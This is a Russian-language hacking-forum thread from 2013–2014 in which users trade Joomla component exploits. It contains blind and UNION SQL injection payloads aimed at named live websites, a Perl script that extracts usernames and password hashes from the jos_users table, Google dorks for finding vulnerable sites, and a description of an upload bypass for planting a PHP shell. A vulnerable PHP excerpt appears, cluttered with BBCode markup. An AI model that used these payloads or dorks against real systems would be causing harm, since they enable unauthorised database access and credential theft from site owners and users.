ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

04.02.2013, 08:13
|
|
Guest
Сообщений: n/a
Провел на форуме: 50454
Репутация:
0
|
|
Подскажите пожалуйста, это какая версия джумлы: $Id: configuration.php-dist 11687 2009-03-11 17:49:23Z ian $ ?
|
|
|
|

25.02.2013, 23:58
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Blind
Joomla "com_spidercalendar" component SQL Injection
Уязвим параметр calendar_id
POC:
Сообщение от None
http://www.saawf.co.za/index.php?option=com_spidercalendar&view=spidercal endar&calendar_id=1+and+1=1+--+&module_id=60&date60=2012-08-11&Itemid=
- true
Сообщение от None
http://www.saawf.co.za/index.php?option=com_spidercalendar&view=spidercal endar&calendar_id=1+and+1=0+--+&module_id=60&date60=2012-08-11&Itemid=
- false
Exploit переписанный под пример данного сайта!
Сообщение от None
#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " \n"; print " ################################################## ##############\n"; print " # Joomla Component com_spidercalendar Blind SQL Injection Exploit #\n"; print " # Author:winstrool #\n"; print " ################################################## ##############\n"; exit; } my $host = $ARGV[0]; my $path = $ARGV[1]; my $tid = $ARGV[2]; my %options = (); GetOptions(\%options, "p=s", "t=i"); print "[~] Exploiting...\n"; if($options{"t"}) { $tid = $options{"t"}; } syswrite(STDOUT, "[~] MD5-Hash: ", 14); for(my $i = 1; $i new; my $query = "http://".$host.$path."index.php?option=com_spidercalendar &calendar_id=".$tid." and (SUBSTRING((SELECT concat(username,0x3a,password,0x3a,usertype) from jos_users limit 0,1),".$i.",1))=CHAR(".$h.") -- &module_id=60&date60=2012-08-11&Itemid=" ; if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); } my $resp = $ua->get($query); my $content = $resp->as_string; if($content =~ /Rankings/) { #print $h; return 1; } else { return 0; } }
Дорк: "inurl:index.php?option=com_spidercalendar calendar_id=*"
Уязвимый код:
Пока нет...
P.S:Уязвимость другой переменной данного компанента
http://www.exploit-db.com/exploits/23782/ (2012-12-31)
|
|
|

26.02.2013, 15:16
|
|
Новичок
Регистрация: 21.12.2009
Сообщений: 0
Провел на форуме: 15756
Репутация:
0
|
|
Сообщение от winstrool
winstrool said:
Joomla "com_spidercalendar" component SQL Injection
Уязвим параметр
calendar_id
POC:
-
true
-
false
Exploit переписанный под пример данного сайта!
Дорк:
"inurl:index.php?option=com_spidercalendar calendar_id=*"
Уязвимый код:
Пока нет...
P.S:Уязвимость другой переменной данного компанента
http://www.exploit-db.com/exploits/23782/ (2012-12-31)
Ты всё-же мой любимый хакер
Blind - OK
http://www.saawf.co.za/index.php?option=com_spidercalendar&view=spidercal endar&calendar_id=1 UNION SELECT 1,2,3,4,0x3c61207461726765743d225f626c616e6b222068 7265663d22687474703a2f2f7777772e726164696b616c2e72 75223e3c696d67207372633d22687474703a2f2f693038312e 726164696b616c2e72752f313330322f31342f326637633233 3033326532612e6a706722203e3c2f613e,6,7,8,9,10,11,1 2,13,14,15,16,17-- &module_id=60&date60=2012-08-11&Itemid=
|
|
|

26.02.2013, 22:26
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Сообщение от KolosJey
KolosJey said:
Ты всё-же мой любимый хакер
Blind - OK
http://www.saawf.co.za/index.php?option=com_spidercalendar&view=spidercal endar&calendar_id=1 UNION SELECT 1,2,3,4,0x3c61207461726765743d225f626c616e6b222068 7265663d22687474703a2f2f7777772e726164696b616c2e72 75223e3c696d67207372633d22687474703a2f2f693038312e 726164696b616c2e72752f313330322f31342f326637633233 3033326532612e6a706722203e3c2f613e,6,7,8,9,10,11,1 2,13,14,15,16,17-- &module_id=60&date60=2012-08-11&Itemid=
а ты все также смышлен))) действует не везде, а с блиндом проходит больше ситуаций, да и кому, как крутить дело каждого...
|
|
|

04.03.2013, 18:57
|
|
Новичок
Регистрация: 10.08.2008
Сообщений: 18
Провел на форуме: 62627
Репутация:
6
|
|
Ни у кого случайно не завалялись исходники уязвимого к LFI компонента com_properties версия 3.1.22-03
Столкнулся с проблемой усечения расширения null байтом. Глянуть бы исходники
Подробности тут: /thread375124.html
P.S. Очень плохая манера описывать уязвимость и не указывать участок кода, в котором она найдена, т.к. зачастую после публикации уязвимости скрипт попросту пропадает с прилавков интернета...
|
|
|

21.08.2013, 13:34
|
|
Guest
Сообщений: n/a
Провел на форуме: 2290
Репутация:
0
|
|
Как узнать версию Joomla 2.5/3.0
Если есть доступ на чтение из БД, выполнить следующий запрос:
select version_id from префикс_schemas where extension_id=700;
или
select manifest_cache from префикс_extensions where extension_id=700;
|
|
|
|

21.08.2013, 14:16
|
|
Guest
Сообщений: n/a
Провел на форуме: 2290
Репутация:
0
|
|
Сообщение от exstreme
exstreme said:
Кто может рассказать более подробно про данную уязвимость, а точнее как она осуществялется?
Код:
Code:
Description
Inadequate filtering leads to the ability to bypass file type upload restrictions.
Affected Installs
Joomla! version 2.5.13 and earlier 2.5.x versions; and version 3.1.4 and earlier 3.x versions.
Описание уязвимости http://developer.joomla.org/security...orised-uploads
Уязвимый код https://github.com/joomla/joomla-cms...3d5378622133d8
Позволяет залить шелл с расширением *.php. (на конце расширения файла точка) через встроенный медиа-менеджер Joomla. Требуется доступ на сайт в качестве автора/редактора. Т.е. без соответствующих привелегий залить не получится.
Актуально для версий Joomla от 2.5.0 до 2.5.13 и от 3.0.0 до 3.1.4 включительно.
|
|
|
|

09.11.2013, 19:18
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Joomla "com_muscol" component SQL Injection
Уязвим параметр genre_id, в данном компаненте есть и другие уязвимые параметры.
POC:
Сообщение от None
http://www.jazz.org.au/index.php?option=com_muscol&view=search&search=alb ums&genre_id=2+and(select+ascii(mid(concat(version ()),1,1))=53)
- true
Сообщение от None
http://www.jazz.org.au/index.php?option=com_muscol&view=search&search=alb ums&genre_id=2+and(select+ascii(mid(concat(version ()),1,1))=52)
- false
Дорк: "inurl:index.php?option=com_muscol genre_id=*"
Уязвимый код:
Пока нет...
|
|
|

11.12.2013, 16:37
|
|
Guest
Сообщений: n/a
Провел на форуме: 44130
Репутация:
26
|
|
Сообщение от winstrool
winstrool said:
Уязвимый код:
Пока нет...
Файл: components/com_muscol/models/search.php
Код:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]genre_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]JRequest[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getVar[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'genre_id'[/COLOR][COLOR="#007700"]);
...
function[/COLOR][COLOR="#0000BB"]_buildQuery[/COLOR][COLOR="#007700"](){
if(empty([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"])){
[/COLOR][COLOR="#0000BB"]$keywords[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]keywords[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$artist_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]artist_id[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$genre_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]genre_id[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$where_clause[/COLOR][COLOR="#007700"]= array();
if ([/COLOR][COLOR="#0000BB"]$keywords[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]$where_clause[/COLOR][COLOR="#007700"][] =[/COLOR][COLOR="#DD0000"]' s.name LIKE "%'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$keywords[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'%"'[/COLOR][COLOR="#007700"];
if ([/COLOR][COLOR="#0000BB"]$artist_id[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$where_clause[/COLOR][COLOR="#007700"][] =[/COLOR][COLOR="#DD0000"]' ( al.artist_id = '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$artist_id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' OR s.artist_id = '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$artist_id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]')'[/COLOR][COLOR="#007700"];
}
if ([/COLOR][COLOR="#0000BB"]$genre_id[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$genre[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$genre_id[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getDescendantsId[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$genre_id[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$descendants[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]descendantsId[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$descendants[/COLOR][COLOR="#007700"][] =[/COLOR][COLOR="#0000BB"]$genre_id[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$genre_clause[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]' (( s.genre_id = '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]implode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]' OR s.genre_id = '[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$descendants[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]' ) '[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]' OR ( s.genre_id ="" AND ( al.genre_id = '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]implode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]' OR al.genre_id = '[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$descendants[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]' ) ) )'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$where_clause[/COLOR][COLOR="#007700"][] =[/COLOR][COLOR="#0000BB"]$genre_clause[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#FF8000"]// Build the where clause of the content record query
[/COLOR][COLOR="#0000BB"]$where_clause[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]count[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$where_clause[/COLOR][COLOR="#007700"]) ?[/COLOR][COLOR="#DD0000"]' WHERE '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]implode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]' AND '[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$where_clause[/COLOR][COLOR="#007700"]) :[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]' SELECT s.*,al.name as album_name,al.image, ar.artist_name FROM #__muscol_songs as s '[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]' LEFT JOIN #__muscol_albums as al ON al.id = s.album_id '[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]' LEFT JOIN #__muscol_artists as ar ON ( ar.id = s.artist_id OR ar.id = al.artist_id ) '[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#0000BB"]$where_clause[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]' ORDER BY s.artist_id, al.year, al.month, al.id, s.disc_num,s.num '
[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]//echo $this->query; die();
[/COLOR][COLOR="#007700"]}
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"];
}[/COLOR][/COLOR]
|
|
|
|

04.11.2014, 02:33
|
|
Новичок
Регистрация: 03.06.2009
Сообщений: 2
Провел на форуме: 7702
Репутация:
0
|
|
joomla 3.2.1
index.php/weblinks-categories?id=0%20%29%20union%20select%20concat_ws (0x3a,username,password)%20from%20%60ppo1v_users%6 0%20--%20%29
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|